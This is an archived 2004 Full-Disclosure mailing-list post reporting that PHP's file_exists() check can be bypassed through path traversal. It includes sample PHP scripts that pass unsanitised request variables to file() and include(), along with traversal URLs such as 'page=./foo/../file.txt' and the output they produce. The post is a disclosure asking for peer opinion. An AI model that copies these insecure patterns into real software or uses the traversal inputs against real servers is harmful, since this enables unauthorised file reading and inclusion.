lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
From: lostnoobs at security-challenge.com (Nourredine Himeur)
Subject: file_exists() bypassing , critical problem ?

Hi,
 There is a security problem on the file_exists() function who allows
 unauthorized users to bypassing the function.
 For example, an user use this function for checking the existence and
 display the source code of his file "my_file.php" in the "/test"
directory.
 He use for this a script like this one :
 ----- file_exists.php -----
 <?php
 if(file_exists($var)){
 echo("File exist<br><br>");
 $source = file( $var );
 while ( list( $num_line, $line ) = each( $source ) )
 {
 echo "<B>Line $num_line:</B> ".htmlspecialchars( $line ) . "<br>";
 }
 }else{
 echo("File doesn't exist<br<br ");
 $source = file( $var );
 while ( list( $num_line, $line ) = each( $source ) )
 {
 echo "<B>Line $num_line:</B> ".htmlspecialchars( $line ) . "<br>";
 }
 }
 ?
 ----- file_exists.php -----
 He test his script with the following adress on his server :
 http://[server]/test/file_exists.php?var=my_file.php
 The file "my_file.php" contain the following text :
 ----- my_file.php -----
 PHP is a widely-used
 general-purpose scripting
 language that is especially
 suited for Web development
 and can be embedded into HTML.
 ----- my_file.php -----
 After launching his script, he obtain :
 ----- http://[server]/test/file_exists.php?var=my_file.php -----
 File exist
 Line 0: PHP is a widely-used
 Line 1: general-purpose scripting
 Line 2: language that is especially
 Line 3: suited for Web development
 Line 4: and can be embedded into HTML.
 ----- http://[server]/test/file_exists.php?var=my_file.php -----
 Up to here everything seems to be normal.
 If he test it with another name file, he obtain :
 ----- http://[server]/test/file_exists.php?var=another_file.php -----
 File doesn't exist

 Warning: file(test): failed to open stream: No such file or directory in
 /home/xxx/www/test/file_exists.php on line 11
 Warning: Variable passed to each() is not an array or object in
 /home/xxx/www/test/file_exists.php on line 12
 ----- http://[server]/test/file_exists.php?var=another_file.php -----
 It's normal too...
 But, if an user test this script for example with the following link :
 http://[server]/test/file_exists.php?var=anything/../my_file.php, he
obtain
 :
 -----
http://[server]/test/file_exists.php?var=anything/../my_file.php -----
 File doesn't exist
 Line 0: PHP is a widely-used
 Line 1: general-purpose scripting
 Line 2: language that is especially
 Line 3: suited for Web development
 Line 4: and can be embedded into HTML.
 -----
http://[server]/test/file_exists.php?var=anything/../my_file.php -----
 We can see that the file_exists() function return that the file doesn't
 exist, but the source code has been displayed.
 It's a very critical bug because a malicious user can use it to bypassing
 the file_exist() protection on a include() script for example.

???????????????????????????????????????????????????????????????????????????????

Another example more simply:

In the same directory :
test.php
-----------------------------------------------------------
<?
if(file_exists($page)){
echo("Sorry the local page is protected");
}else{
include($page);
}
?>
-----------------------------------------------------------

file.txt
-----------------------------------------------------------
Hello Word
-----------------------------------------------------------

http://www.example.com/test.php?page=file.txt

Result:
Sorry the local page is protected

http://www.example.com/test.php?page=./foo/../file.txt

Result:
Hello Word

The function file_exists() is bypassing

???????????????????????????????????????????????????????????????????????????????


I want to know if you thinks that's a real vulnerability or not ? (securityfocus says NO and don't want to publish it)

If you have any questions. Don't hesitate to contact me.

Nourredine Himeur

lostnoobs@...urity-challenge.com

www.security-challenge.com

-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20040202/483b7525/attachment.html

Powered by blists - more mailing lists